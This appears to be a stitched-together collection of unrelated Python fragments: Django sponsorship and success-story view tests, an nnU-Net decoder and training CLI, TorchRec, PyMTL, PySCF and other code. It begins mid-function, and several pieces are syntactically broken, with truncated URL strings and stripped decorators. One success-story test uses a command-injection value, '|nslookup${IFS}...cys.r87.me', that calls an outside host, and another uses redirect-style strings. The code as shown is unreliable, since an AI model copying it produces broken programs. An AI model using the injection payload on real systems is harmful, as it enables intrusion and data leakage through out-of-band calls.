        sponsorship.save()
        baker.make_recipe('sponsors.tests.empty_contract', sponsorship=sponsorship)
        sponsorship.rollback_to_editing()
        sponsorship.save()
        sponsorship.refresh_from_db()
        self.assertEqual(sponsorship.status, Sponsorship.APPLIED)
        self.assertEqual(0, Contract.objects.count())

    def test_can_not_rollback_sponsorship_to_edit_if_contract_was_sent(self):
        """Once the contract awaits signature, rollback must fail and keep it."""
        sponsorship = Sponsorship.new(self.sponsor, self.benefits)
        sponsorship.status = Sponsorship.APPROVED
        sponsorship.save()
        baker.make_recipe('sponsors.tests.awaiting_signature_contract', sponsorship=sponsorship)
        with self.assertRaises(InvalidStatusException):
            sponsorship.rollback_to_editing()
        self.assertEqual(1, Contract.objects.count())

    def test_raise_exception_when_trying_to_create_sponsorship_for_same_sponsor(self):
        """A sponsor may re-apply after a finalized/rejected sponsorship, but
        not while one is still pending (applied/approved)."""
        sponsorship = Sponsorship.new(self.sponsor, self.benefits)
        finalized_status = [Sponsorship.REJECTED, Sponsorship.FINALIZED]
        for status in finalized_status:
            sponsorship.status = status
            sponsorship.save()
            new_sponsorship = Sponsorship.new(self.sponsor, self.benefits)
            new_sponsorship.refresh_from_db()
            self.assertTrue(new_sponsorship.pk)
            new_sponsorship.delete()
        pending_status = [Sponsorship.APPLIED, Sponsorship.APPROVED]
        for status in pending_status:
            sponsorship.status = status
            sponsorship.save()
            with self.assertRaises(SponsorWithExistingApplicationException):
                Sponsorship.new(self.sponsor, self.benefits)

    def test_display_agreed_fee_for_approved_and_finalized_status(self):
        """agreed_fee reflects sponsorship_fee once approved or finalized."""
        sponsorship = Sponsorship.new(self.sponsor, self.benefits)
        sponsorship.sponsorship_fee = 2000
        sponsorship.save()
        finalized_status = [Sponsorship.APPROVED, Sponsorship.FINALIZED]
        for status in finalized_status:
            sponsorship.status = status
            sponsorship.save()
            self.assertEqual(sponsorship.agreed_fee, 2000)
class UNetDecoder(nn.Module):
    """U-Net decoder with an additional 'cross conv' fusion path.

    At every decoder stage except the last, instead of concatenating only the
    matching encoder skip, all intermediate skips are resized to the current
    resolution, concatenated, compressed by a 1x1 conv+BN ('cross conv') and
    then concatenated with the upsampled feature map. The last (highest
    resolution) stage uses the plain U-Net skip connection.
    NOTE(review): cross_conv uses nn.Conv2d/BatchNorm2d, so this decoder
    assumes 2D inputs even though the encoder's conv_op is used elsewhere.
    """

    def __init__(self, encoder: Union[(PlainConvEncoder, ResidualEncoder)], num_classes: int, n_conv_per_stage: Union[(int, Tuple[(int, ...)], List[int])], deep_supervision, nonlin_first: bool=False):
        """Build transposed convs, conv stages, seg heads and cross convs
        mirroring the encoder's stage configuration.

        Args:
            encoder: the matching encoder; its channels/strides/kernel sizes
                drive the decoder layout.
            num_classes: number of segmentation output channels.
            n_conv_per_stage: conv blocks per decoder stage (int is broadcast
                to all stages).
            deep_supervision: if True, emit one seg output per stage.
            nonlin_first: passed through to StackedConvBlocks.
        """
        super().__init__()
        self.deep_supervision = deep_supervision
        self.encoder = encoder
        self.num_classes = num_classes
        n_stages_encoder = len(encoder.output_channels)
        if isinstance(n_conv_per_stage, int):
            n_conv_per_stage = ([n_conv_per_stage] * (n_stages_encoder - 1))
        assert (len(n_conv_per_stage) == (n_stages_encoder - 1)), ('n_conv_per_stage must have as many entries as we have resolution stages - 1 (n_stages in encoder - 1), here: %d' % n_stages_encoder)
        transpconv_op = get_matching_convtransp(conv_op=encoder.conv_op)
        stages = []
        transpconvs = []
        seg_layers = []
        # 1x1 convs (no padding) that compress the concatenated, resized skips
        # down to the channel count of the stage's own skip connection.
        (cross_conv_kernel_size, cross_conv_padding) = (1, 0)
        self.start_stage = 1
        # Total channels of the intermediate skips (excluding first and last).
        total_channels = sum(encoder.output_channels[self.start_stage:(- 1)])
        self.cross_conv = [nn.Sequential(nn.Conv2d(total_channels, encoder.output_channels[(- (s + 2))], kernel_size=cross_conv_kernel_size, stride=1, padding=cross_conv_padding, bias=False), nn.BatchNorm2d(encoder.output_channels[(- (s + 2))])) for s in range(len(encoder.output_channels[:(- self.start_stage)]))]
        # nn.Sequential used purely as an indexable module container here.
        self.cross_conv = nn.Sequential(*self.cross_conv)
        for s in range(1, n_stages_encoder):
            input_features_below = encoder.output_channels[(- s)]
            input_features_skip = encoder.output_channels[(- (s + 1))]
            stride_for_transpconv = encoder.strides[(- s)]
            transpconvs.append(transpconv_op(input_features_below, input_features_skip, stride_for_transpconv, stride_for_transpconv, bias=encoder.conv_bias))
            # Stage input is 2 * skip channels: upsampled features + (cross
            # conv output or plain skip), both with input_features_skip chans.
            stages.append(StackedConvBlocks(n_conv_per_stage[(s - 1)], encoder.conv_op, (2 * input_features_skip), input_features_skip, encoder.kernel_sizes[(- (s + 1))], 1, encoder.conv_bias, encoder.norm_op, encoder.norm_op_kwargs, encoder.dropout_op, encoder.dropout_op_kwargs, encoder.nonlin, encoder.nonlin_kwargs, nonlin_first))
            seg_layers.append(encoder.conv_op(input_features_skip, num_classes, 1, 1, 0, bias=True))
        self.stages = nn.ModuleList(stages)
        self.transpconvs = nn.ModuleList(transpconvs)
        self.seg_layers = nn.ModuleList(seg_layers)
        # Debug output left in on purpose? Prints the decoder layout at build.
        print(f'using my unet'.center(50, '='))
        print(f'cross conv: {self.cross_conv}')

    def forward(self, skips):
        """Decode from the deepest skip upward.

        Args:
            skips: encoder outputs, lowest resolution last (skips[-1] is the
                bottleneck).
        Returns:
            A single segmentation map, or a list (highest resolution first)
            when deep supervision is enabled.
        """
        lres_input = skips[(- 1)]
        seg_outputs = []
        for s in range(len(self.stages)):
            x = self.transpconvs[s](lres_input)
            dispatch = []
            if (s == (len(self.stages) - 1)):
                # Final stage: plain U-Net concat with the matching skip.
                x = torch.cat((x, skips[(- (s + 2))]), 1)
            else:
                # Resize every intermediate skip to x's spatial size:
                # upsample smaller maps, pool larger ones (compared on the
                # last spatial dim only).
                for y in skips[1:(- 1)]:
                    if (y.shape[(- 1)] < x.shape[(- 1)]):
                        dispatch.append(F.interpolate(y, x.shape[(- 2):]))
                    elif (y.shape[(- 1)] > x.shape[(- 1)]):
                        dispatch.append(F.adaptive_max_pool2d(y, x.shape[(- 2):]))
                    else:
                        dispatch.append(y)
                dispatch = torch.cat(dispatch, dim=1)
                x = torch.cat([x, self.cross_conv[s](dispatch)], dim=1)
            x = self.stages[s](x)
            if self.deep_supervision:
                seg_outputs.append(self.seg_layers[s](x))
            elif (s == (len(self.stages) - 1)):
                # Without deep supervision only the last head is used.
                seg_outputs.append(self.seg_layers[(- 1)](x))
            lres_input = x
        # Reverse so the highest-resolution output comes first.
        seg_outputs = seg_outputs[::(- 1)]
        if (not self.deep_supervision):
            r = seg_outputs[0]
        else:
            r = seg_outputs
        return r

    def compute_conv_feature_map_size(self, input_size):
        """Estimate the total feature-map element count for memory planning.

        NOTE(review): this mirrors the plain nnU-Net decoder accounting and
        does not include the cross_conv branch's feature maps.
        """
        skip_sizes = []
        for s in range((len(self.encoder.strides) - 1)):
            skip_sizes.append([(i // j) for (i, j) in zip(input_size, self.encoder.strides[s])])
            input_size = skip_sizes[(- 1)]
        assert (len(skip_sizes) == len(self.stages))
        output = np.int64(0)
        for s in range(len(self.stages)):
            # Conv blocks of the stage, plus the transpconv output, plus the
            # segmentation head where one is emitted.
            output += self.stages[s].compute_conv_feature_map_size(skip_sizes[(- (s + 1))])
            output += np.prod([self.encoder.output_channels[(- (s + 2))], *skip_sizes[(- (s + 1))]], dtype=np.int64)
            if (self.deep_supervision or (s == (len(self.stages) - 1))):
                output += np.prod([self.num_classes, *skip_sizes[(- (s + 1))]], dtype=np.int64)
        return output
class TestKeyedJaggedTensorScripting(unittest.TestCase):
    """Checks that KeyedJaggedTensor construction and its distributed helper
    methods survive TorchScript compilation (torch.jit.script)."""

    def test_scriptable_forward(self) -> None:
        """A module using indexing, dist_* helpers and dist_init must script."""
        class MyModule(torch.nn.Module):
            def forward(self, input: KeyedJaggedTensor) -> KeyedJaggedTensor:
                # Exercise methods TorchScript must be able to type-check;
                # the results themselves are discarded.
                input['any'].values()
                input.dist_labels()
                input.dist_splits([1, 2])
                return KeyedJaggedTensor.dist_init(keys=input.keys(), tensors=input.dist_tensors(), variable_stride_per_key=False, num_workers=2, recat=torch.tensor([]), stride_per_rank=[2, 3])
        m = MyModule()
        torch.jit.script(m)

    def test_scriptable_split(self) -> None:
        """split() returning a list of KJTs must be scriptable."""
        class MyModule(torch.nn.Module):
            def forward(self, input: KeyedJaggedTensor) -> List[KeyedJaggedTensor]:
                return input.split([1, 0, 1])
        m = MyModule()
        torch.jit.script(m)

    def test_scriptable_init(self) -> None:
        """from_offsets_sync (fixed and variable batch) must be scriptable."""
        def create_kjt() -> KeyedJaggedTensor:
            return KeyedJaggedTensor.from_offsets_sync(values=torch.tensor([1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0]), weights=torch.tensor([1.0, 0.5, 1.5, 1.0, 0.5, 1.0, 1.0, 1.5]), keys=['index_0', 'index_1'], offsets=torch.tensor([0, 0, 2, 2, 3, 4, 5, 5, 8], dtype=torch.int32))
        def create_vb_kjt() -> KeyedJaggedTensor:
            return KeyedJaggedTensor.from_offsets_sync(values=torch.tensor([1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0]), weights=torch.tensor([1.0, 0.5, 1.5, 1.0, 0.5, 1.0, 1.0, 1.5]), keys=['index_0', 'index_1'], offsets=torch.tensor([0, 0, 2, 2, 3, 4, 5, 5, 8], dtype=torch.int32), stride_per_key_per_rank=[[2], [4]])
        torch.jit.script(create_kjt)
        torch.jit.script(create_vb_kjt)

    def test_scriptable_empty(self) -> None:
        """empty() constructors (weighted and not) must be scriptable."""
        def create_empty() -> KeyedJaggedTensor:
            return KeyedJaggedTensor.empty()
        def create_empty_weighted() -> KeyedJaggedTensor:
            return KeyedJaggedTensor.empty(is_weighted=True)
        torch.jit.script(create_empty)
        torch.jit.script(create_empty_weighted)
def perf_attrib(returns, positions, factor_returns, factor_loadings):
    """Attribute portfolio returns to risk factors.

    Restricts factor data to the returns' date range, computes factor
    exposures, and decomposes returns into common (factor-driven), specific,
    tilt and timing components.

    Returns:
        (risk exposures DataFrame, DataFrame of per-factor attribution joined
        with the return decomposition columns).
    """
    period_start = returns.index[0]
    period_end = returns.index[(- 1)]

    # Align factor data with the returns window and normalize index names.
    factor_returns = factor_returns.loc[period_start:period_end]
    factor_loadings = factor_loadings.loc[period_start:period_end]
    factor_loadings.index = factor_loadings.index.set_names(['dt', 'ticker'])
    positions = positions.copy()
    positions.index = positions.index.set_names(['dt', 'ticker'])

    risk_exposures_portfolio = compute_exposures(positions, factor_loadings)

    # Per-factor contribution and its sum (the factor-explained return).
    perf_attrib_by_factor = risk_exposures_portfolio.multiply(factor_returns)
    common_returns = perf_attrib_by_factor.sum(axis='columns')

    # Tilt = average exposure held over the period; timing is the remainder.
    tilt_returns = factor_returns.multiply(risk_exposures_portfolio.mean()).sum(axis='columns')
    timing_returns = common_returns - tilt_returns
    specific_returns = returns - common_returns

    returns_df = pd.DataFrame(OrderedDict([
        ('total_returns', returns),
        ('common_returns', common_returns),
        ('specific_returns', specific_returns),
        ('tilt_returns', tilt_returns),
        ('timing_returns', timing_returns),
    ]))
    return (risk_exposures_portfolio,
            pd.concat([perf_attrib_by_factor, returns_df], axis='columns'))
def test_history_edit(monkeypatch):
    """`history -e 1:2` should open the entries in the editor once and replay them once."""
    app = cmd2.Cmd(multiline_commands=['alias'])
    app.editor = 'fooedit'
    # Stub out the editor launch and the script re-run so nothing external executes.
    edit_mock = mock.MagicMock(name='run_editor')
    monkeypatch.setattr('cmd2.Cmd.run_editor', edit_mock)
    run_script_mock = mock.MagicMock(name='do_run_script')
    monkeypatch.setattr('cmd2.Cmd.do_run_script', run_script_mock)
    # Seed history with two commands; 'alias' is multiline, hence the ';' terminator.
    run_cmd(app, 'help')
    run_cmd(app, 'alias create my_alias history;')
    run_cmd(app, 'history -e 1:2')
    # One editor session for the span, one replay of the edited script.
    edit_mock.assert_called_once()
    run_script_mock.assert_called_once()
def test_illegal_inport_deep_write():
    """A top-level update block must not drive a grandchild's InPort; expect SignalTypeError."""
    # NOTE(review): update-block decorators appear stripped in this copy of the
    # file -- confirm against upstream before running.
    class B(ComponentLevel3):

        def construct(s):
            s.in_ = InPort(Bits32)

            def up_B_print():
                print(s.in_)

    class BWrap(ComponentLevel3):

        def construct(s):
            s.b = B()

    class Top(ComponentLevel3):

        def construct(s):
            s.b = BWrap()

            def up_write_b_in():
                # Illegal cross-hierarchy write into a child's child InPort slice.
                s.b.b.in_[1:10] = 10
    try:
        _test_model(Top)
    except SignalTypeError as e:
        print('{} is thrown\n{}'.format(e.__class__.__name__, e))
        return
    raise Exception("Should've thrown invalid input port write SignalTypeError.")
class RK23(RKAdaptiveStepSolver):
    """Explicit adaptive Runge-Kutta pair of order 3(2).

    The coefficients match the Bogacki--Shampine pair used by
    ``scipy.integrate.RK23``: 3 stages produce the 3rd-order solution, with an
    embedded 2nd-order estimate for step-size control.
    """
    # Order of the embedded (lower-order) error estimator.
    error_estimator_order = 2
    n_stages = 3
    # C: stage time fractions; A: stage coupling matrix (strictly lower triangular).
    C = torch.tensor([0, (1 / 2), (3 / 4)], dtype=torch.float64)
    A = torch.tensor([[0, 0, 0], [(1 / 2), 0, 0], [0, (3 / 4), 0]], dtype=torch.float64)
    # B: weights of the 3rd-order solution.
    B = torch.tensor([(2 / 9), (1 / 3), (4 / 9)], dtype=torch.float64)
    # E: error-estimate weights; 4 entries -- presumably the extra entry weights
    # the derivative at the new step (FSAL), as in scipy. TODO confirm in base class.
    E = torch.tensor([(5 / 72), ((- 1) / 12), ((- 1) / 9), (1 / 8)], dtype=torch.float64)
def run_training_entry():
    """CLI entry point for nnU-Net v2 training; parses flags and calls run_training()."""
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument('dataset_name_or_id', type=str, help='Dataset name or ID to train with')
    parser.add_argument('configuration', type=str, help='Configuration that should be trained')
    # Note: fold is parsed as str (not int) -- downstream presumably also accepts
    # values like 'all'; TODO confirm against run_training's handling.
    parser.add_argument('fold', type=str, help='Fold of the 5-fold cross-validation. Should be an int between 0 and 4.')
    parser.add_argument('-tr', type=str, required=False, default='nnUNetTrainer', help='[OPTIONAL] Use this flag to specify a custom trainer. Default: nnUNetTrainer')
    parser.add_argument('-p', type=str, required=False, default='nnUNetPlans', help='[OPTIONAL] Use this flag to specify a custom plans identifier. Default: nnUNetPlans')
    parser.add_argument('-pretrained_weights', type=str, required=False, default=None, help='[OPTIONAL] path to nnU-Net checkpoint file to be used as pretrained my_models. Will only be used when actually training. Beta. Use with caution.')
    parser.add_argument('-num_gpus', type=int, default=1, required=False, help='Specify the number of GPUs to use for training')
    parser.add_argument('--use_compressed', default=False, action='store_true', required=False, help='[OPTIONAL] If you set this flag the training cases will not be decompressed. Reading compressed data is much more CPU and (potentially) RAM intensive and should only be used if you know what you are doing')
    parser.add_argument('--npz', action='store_true', required=False, help='[OPTIONAL] Save softmax predictions from final validation as npz files (in addition to predicted segmentations). Needed for finding the best ensemble.')
    parser.add_argument('--c', action='store_true', required=False, help='[OPTIONAL] Continue training from latest checkpoint')
    parser.add_argument('--val', action='store_true', required=False, help='[OPTIONAL] Set this flag to only run the validation. Requires training to have finished.')
    parser.add_argument('--disable_checkpointing', action='store_true', required=False, help='[OPTIONAL] Set this flag to disable checkpointing. Ideal for testing things out and you dont want to flood your hard drive with checkpoints.')
    parser.add_argument('-device', type=str, default='cuda', required=False, help="Use this to set the device the training should run with. Available options are 'cuda' (GPU), 'cpu' (CPU) and 'mps' (Apple M1/M2). Do NOT use this to set which GPU ID! Use CUDA_VISIBLE_DEVICES=X nnUNetv2_train [...] instead!")
    parser.add_argument('--job_id', type=str, default='unknown', required=False, help='qsub job id.')
    # --debug / --no-debug pair sharing one dest; defaults to debug=True.
    parser.add_argument('--debug', dest='debug', action='store_true')
    parser.add_argument('--no-debug', dest='debug', action='store_false')
    parser.set_defaults(debug=True)
    args = parser.parse_args()
    assert (args.device in ['cpu', 'cuda', 'mps']), f'-device must be either cpu, mps or cuda. Other devices are not tested/supported. Got: {args.device}.'
    if (args.device == 'cpu'):
        # CPU training uses all cores; CUDA keeps torch's own threading minimal.
        import multiprocessing
        torch.set_num_threads(multiprocessing.cpu_count())
        device = torch.device('cpu')
    elif (args.device == 'cuda'):
        torch.set_num_threads(1)
        torch.set_num_interop_threads(1)
        device = torch.device('cuda')
    else:
        device = torch.device('mps')
    # Remap specific scheduler job ids onto earlier ones -- presumably to resume
    # under the original job's output folders; TODO confirm intent of these ids.
    if (args.job_id == '458803'):
        args.job_id = '456319'
    elif (args.job_id == '458805'):
        args.job_id = '456329'
    elif (args.job_id == '458824'):
        args.job_id = '458821'
    run_training(args.dataset_name_or_id, args.configuration, args.fold, args.tr, args.p, args.pretrained_weights, args.num_gpus, args.use_compressed, args.npz, args.c, args.val, args.disable_checkpointing, device=device, debug=args.debug, job_id=args.job_id)
# NOTE(review): the decorator below lost its '@pytest.mark' prefix in this copy
# of the file -- restore before running.
.parametrize('op, x, exc, op_args', [(nlinalg.MatrixInverse, set_test_value(pt.dmatrix(), (lambda x: x.T.dot(x))(rng.random(size=(3, 3)).astype('float64'))), None, ()), (nlinalg.MatrixInverse, set_test_value(pt.lmatrix(), (lambda x: x.T.dot(x))(rng.integers(1, 10, size=(3, 3)).astype('int64'))), None, ()), (nlinalg.MatrixPinv, set_test_value(pt.dmatrix(), (lambda x: x.T.dot(x))(rng.random(size=(3, 3)).astype('float64'))), None, (True,)), (nlinalg.MatrixPinv, set_test_value(pt.lmatrix(), (lambda x: x.T.dot(x))(rng.integers(1, 10, size=(3, 3)).astype('int64'))), None, (False,))])
def test_matrix_inverses(op, x, exc, op_args):
    """Compare the Numba backend against pure Python for MatrixInverse/MatrixPinv."""
    g = op(*op_args)(x)
    g_fg = FunctionGraph(outputs=[g])
    # exc, when set, is an expected warning class; otherwise run with no expectation.
    cm = (contextlib.suppress() if (exc is None) else pytest.warns(exc))
    with cm:
        compare_numba_and_py(g_fg, [i.tag.test_value for i in g_fg.inputs if (not isinstance(i, (SharedVariable, Constant)))])
# NOTE(review): the decorator below lost its '@pytest.mark' prefix in this copy
# of the file -- restore before running.
.parametrize('entitytrigger', [OSC.EndOfRoadCondition(2), OSC.CollisionCondition('hej'), OSC.OffroadCondition(3), OSC.TimeHeadwayCondition('my entity', 2, OSC.Rule.greaterOrEqual), OSC.TimeToCollisionCondition(1, OSC.Rule.greaterOrEqual, entity='target'), OSC.AccelerationCondition(2, OSC.Rule.greaterOrEqual), OSC.StandStillCondition(5), OSC.SpeedCondition(15, OSC.Rule.greaterOrEqual), OSC.RelativeSpeedCondition(1, OSC.Rule.greaterOrEqual, 'target'), OSC.TraveledDistanceCondition(59), OSC.ReachPositionCondition(OSC.WorldPosition(), 4), OSC.DistanceCondition(4, OSC.Rule.greaterOrEqual, OSC.WorldPosition()), OSC.RelativeDistanceCondition(2, OSC.Rule.greaterOrEqual, OSC.RelativeDistanceType.lateral, 'target')])
def test_entity_condition_factory(entitytrigger):
    """Round-trip every entity condition through its XML element and the parser factory."""
    factoryoutput = OSC.triggers._EntityConditionFactory.parse_entity_condition(entitytrigger.get_element())
    prettyprint(entitytrigger, None)
    prettyprint(factoryoutput, None)
    # Parsing the serialized element must reconstruct an equal condition object.
    assert (entitytrigger == factoryoutput)
def model_grads_to_master_grads(model_params, master_params, flat_master=False):
    """Copy gradients from the model params onto the corresponding master params.

    With ``flat_master=True`` all model gradients are flattened into the single
    master parameter's gradient. Otherwise gradients are copied pairwise; a
    master gradient tensor is lazily allocated on first use, and a missing
    model gradient clears the master gradient to ``None``.
    """
    if flat_master:
        flat = _flatten_dense_tensors([p.grad.data for p in model_params])
        master_params[0].grad.data.copy_(flat)
        return
    for m_param, w_param in zip(model_params, master_params):
        if m_param.grad is None:
            w_param.grad = None
            continue
        if w_param.grad is None:
            # Lazily allocate a gradient buffer shaped like the master param.
            w_param.grad = Variable(w_param.data.new(*w_param.data.size()))
        w_param.grad.data.copy_(m_param.grad.data)
class StoryViewTests(TestCase):
    """View tests for success stories: detail, listing, category, and submission.

    NOTE(review): several 'company_url' values (and one base URL elsewhere) look
    truncated in this copy of the file -- the post_data dict literals are not
    syntactically complete; restore the URL strings before running.
    """

    def setUp(self):
        # One published+featured story and one unpublished story, same category.
        self.user = UserFactory(username='username', password='password')
        self.category = StoryCategoryFactory(name='Arts')
        self.story1 = StoryFactory(category=self.category, featured=True)
        self.story2 = StoryFactory(category=self.category, is_published=False)

    def test_story_view(self):
        """Published story detail renders with the story and its category list."""
        url = reverse('success_story_detail', kwargs={'slug': self.story1.slug})
        r = self.client.get(url)
        self.assertEqual(r.status_code, 200)
        self.assertEqual(r.context['story'].pk, self.story1.pk)
        self.assertEqual(len(r.context['category_list']), 1)

    def test_unpublished_story_view(self):
        """Unpublished stories 404 for anonymous users but render for staff."""
        url = reverse('success_story_detail', kwargs={'slug': self.story2.slug})
        r = self.client.get(url)
        self.assertEqual(r.status_code, 404)
        staff = User.objects.create_superuser(username='spameggs', password='password', email='')
        self.assertTrue(staff.is_staff)
        self.client.login(username=staff.username, password='password')
        r = self.client.get(url)
        self.assertEqual(r.status_code, 200)
        self.assertFalse(r.context['story'].is_published)

    def test_story_list(self):
        """List view exposes only the published story."""
        url = reverse('success_story_list')
        r = self.client.get(url)
        self.assertEqual(r.status_code, 200)
        self.assertEqual(len(r.context['stories']), 1)

    def test_story_category_list(self):
        """Category page exposes both stories (published and unpublished)."""
        url = reverse('success_story_list_category', kwargs={'slug': self.category.slug})
        r = self.client.get(url)
        self.assertEqual(r.status_code, 200)
        self.assertEqual(r.context['object'], self.category)
        self.assertEqual(len(r.context['object'].success_stories.all()), 2)
        self.assertEqual(r.context['object'].success_stories.all()[0].pk, self.story2.pk)

    def test_story_create(self):
        """Submitting creates a draft story, emails a plain-text notification,
        and rejects a second submission with the same name."""
        mail.outbox = []
        url = reverse('success_story_create')
        self.client.login(username='username', password='password')
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
        post_data = {'name': 'Three', 'company_name': 'Company Three', 'company_url': ' 'category': self.category.pk, 'author': 'Kevin Arnold', 'author_email': '', 'pull_quote': 'Liver!', 'content': 'Growing up is never easy.\n\nFoo bar baz.\n', settings.HONEYPOT_FIELD_NAME: settings.HONEYPOT_VALUE}
        response = self.client.post(url, post_data)
        self.assertEqual(response.status_code, 302)
        self.assertRedirects(response, url)
        # One notification email, plain text, replying to the submitter.
        self.assertEqual(len(mail.outbox), 1)
        self.assertEqual(mail.outbox[0].subject, 'New success story submission: {}'.format(post_data['name']))
        expected_output = re.compile('Name: (.*)\\nCompany name: (.*)\\nCompany URL: (.*)\\nCategory: (.*)\\nAuthor: (.*)\\nAuthor email: (.*)\\nPull quote:\\n\\n(.*)\\n\\nContent:\\n\\n(.*)\\n\\nReview URL: (.*)', flags=re.DOTALL)
        self.assertRegex(mail.outbox[0].body, expected_output)
        self.assertNotIn('<p>', mail.outbox[0].body)
        self.assertEqual(mail.outbox[0].content_subtype, 'plain')
        self.assertEqual(mail.outbox[0].reply_to, [post_data['author_email']])
        # The story lands in the draft queue with submitted_by set, creator unset.
        stories = Story.objects.draft().filter(slug__exact='three')
        self.assertEqual(len(stories), 1)
        story = stories[0]
        self.assertIsNotNone(story.created)
        self.assertIsNotNone(story.updated)
        self.assertIsNone(story.creator)
        self.assertEqual(story.submitted_by, self.user)
        # A second post with the same name must be rejected.
        response = self.client.post(url, post_data)
        self.assertEqual(response.status_code, 200)
        self.assertContains(response, 'Please use a unique name.')
        del mail.outbox[:]

    def test_story_multiline_email_subject(self):
        """Only the first line of a multi-line name is used in the email subject."""
        mail.outbox = []
        url = reverse('success_story_create')
        post_data = {'name': 'First line\nSecond line', 'company_name': 'Company Three', 'company_url': ' 'category': self.category.pk, 'author': 'Kevin Arnold', 'author_email': '', 'pull_quote': 'Liver!', 'content': 'Growing up is never easy.\n\nFoo bar baz.\n', settings.HONEYPOT_FIELD_NAME: settings.HONEYPOT_VALUE}
        self.client.login(username='username', password='password')
        response = self.client.post(url, post_data)
        self.assertEqual(response.status_code, 302)
        self.assertRedirects(response, url)
        self.assertEqual(len(mail.outbox), 1)
        self.assertEqual(mail.outbox[0].subject, 'New success story submission: First line')
        self.assertNotIn('Second line', mail.outbox[0].subject)
        del mail.outbox[:]

    def test_story_duplicate_slug(self):
        """Two different names that slugify identically must be rejected."""
        url = reverse('success_story_create')
        post_data = {'name': 'r87comwwwpythonorg', 'company_name': 'Company Three', 'company_url': ' 'category': self.category.pk, 'author': 'Kevin Arnold', 'author_email': '', 'pull_quote': 'Liver!', 'content': 'Growing up is never easy.\n\nFoo bar baz.\n', settings.HONEYPOT_FIELD_NAME: settings.HONEYPOT_VALUE}
        self.client.login(username='username', password='password')
        response = self.client.post(url, post_data)
        self.assertEqual(response.status_code, 302)
        self.assertRedirects(response, url)
        post_data = post_data.copy()
        post_data['name'] = '///r87.com/?www.python.org/'
        response = self.client.post(url, post_data)
        self.assertEqual(response.status_code, 200)
        self.assertContains(response, 'Please use a unique name.')

    def test_slug_field_max_length(self):
        """A very long (attack-style) name must not overflow the slug field."""
        url = reverse('success_story_create')
        post_data = {'name': '|nslookup${IFS}"vprlkb-tutkaenivhxr1i4bxrdosuteo8wh4mb2r""cys.r87.me"', 'company_name': 'Company Three', 'company_url': ' 'category': self.category.pk, 'author': 'Kevin Arnold', 'author_email': '', 'pull_quote': 'Liver!', 'content': 'Growing up is never easy.\n\nFoo bar baz.\n', settings.HONEYPOT_FIELD_NAME: settings.HONEYPOT_VALUE}
        self.client.login(username='username', password='password')
        response = self.client.post(url, post_data)
        self.assertEqual(response.status_code, 302)
        self.assertRedirects(response, url)

    def test_nul_character(self):
        """NUL bytes in the name are rejected with a validation error."""
        url = reverse('success_story_create')
        post_data = {'name': 'Before\x00After', 'company_name': 'Company Three', 'company_url': ' 'category': self.category.pk, 'author': 'Kevin Arnold', 'author_email': '', 'pull_quote': 'Liver!', 'content': 'Growing up is never easy.\n\nFoo bar baz.\n', settings.HONEYPOT_FIELD_NAME: settings.HONEYPOT_VALUE}
        self.client.login(username='username', password='password')
        response = self.client.post(url, post_data)
        self.assertEqual(response.status_code, 200)
        self.assertContains(response, 'Null characters are not allowed.')
def ecp_int(cell, kpts=None):
    """Scalar ECP (effective core potential) integrals for a PBC cell at k-points.

    Returns a single matrix when *kpts* is None or a single k-point of shape
    (3,), otherwise a list of matrices, one per k-point.
    """
    from pyscf.pbc.df import incore
    lib.logger.debug(cell, 'PBC-ECP integrals')
    if (kpts is None):
        kpts_lst = numpy.zeros((1, 3))
    else:
        kpts_lst = numpy.reshape(kpts, ((- 1), 3))
    # Decontract the basis; contr_coeff maps the primitive-basis result back to
    # the contracted basis at the end.
    (cell, contr_coeff) = gto.cell._split_basis(cell)
    lib.logger.debug1(cell, 'nao %d -> nao %d', *contr_coeff.shape)
    # Fake auxiliary cell holding a single dummy s shell so the ECP can be
    # evaluated through the 3-center integral machinery.
    ecpcell = cell.copy(deep=False)
    exp_ptr = cell._ecpbas[((- 1), PTR_EXP)]
    ecpcell._bas = numpy.array([[0, 0, 1, 1, 0, exp_ptr, 0, 0]], dtype=numpy.int32)
    # Tell the integral kernel how many ECP shells there are via _env.
    cell._env[AS_NECPBAS] = len(cell._ecpbas)
    shls_slice = (0, cell.nbas, 0, cell.nbas, 0, 1)
    dfbuilder = incore.Int3cBuilder(cell, ecpcell, kpts_lst).build()
    int3c = dfbuilder.gen_int3c_kernel('ECPscalar', aosym='s2', comp=1, j_only=True, return_complex=True)
    buf = int3c(shls_slice)
    buf = buf.reshape(len(kpts_lst), (- 1))
    mat = []
    for (k, kpt) in enumerate(kpts_lst):
        # aosym='s2' packs the lower triangle; unpack to a full Hermitian matrix.
        v = lib.unpack_tril(buf[k], lib.HERMITIAN)
        if (abs(kpt).max() < 1e-09):
            # Gamma point: the integrals are real.
            v = v.real
        mat.append(reduce(numpy.dot, (contr_coeff.T, v, contr_coeff)))
    if ((kpts is None) or (numpy.shape(kpts) == (3,))):
        mat = mat[0]
    return mat
def parse_args():
    """Parse the command-line options for the QDMR/SQL grounding builder.

    Returns:
        argparse.Namespace with ``output_path`` and ``output_path_all``
        (both default to None).
    """
    arg_parser = argparse.ArgumentParser(description='Build grounding between QDMR and SQL.')
    arg_parser.add_argument(
        '--output_path', type=str, default=None,
        help='path to output file with grounding (found correct SPARQL script)')
    arg_parser.add_argument(
        '--output_path_all', type=str, default=None,
        help='path to output file with grounding')
    return arg_parser.parse_args()
# NOTE(review): '_torch_tpu' below is presumably a stripped '@require_torch_tpu'
# decorator -- restore before running.
_torch_tpu
class TorchXLAExamplesTests(TestCasePlus):
    """End-to-end TPU tests that launch example scripts through xla_spawn."""

    def test_run_glue(self):
        """Train+eval MRPC text classification on 8 TPU cores; check accuracy and runtime."""
        import xla_spawn
        tmp_dir = self.get_auto_remove_tmp_dir()
        # argv for xla_spawn: the launcher consumes the first script path and
        # --num_cores; the rest is forwarded to run_glue.py.
        testargs = f'''
            ./examples/pytorch/text-classification/run_glue.py
            --num_cores=8
            ./examples/pytorch/text-classification/run_glue.py
            --model_name_or_path distilbert-base-uncased
            --output_dir {tmp_dir}
            --overwrite_output_dir
            --train_file ./tests/fixtures/tests_samples/MRPC/train.csv
            --validation_file ./tests/fixtures/tests_samples/MRPC/dev.csv
            --do_train
            --do_eval
            --debug tpu_metrics_debug
            --per_device_train_batch_size=2
            --per_device_eval_batch_size=1
            --learning_rate=1e-4
            --max_steps=10
            --warmup_steps=2
            --seed=42
            --max_seq_length=128
            '''.split()
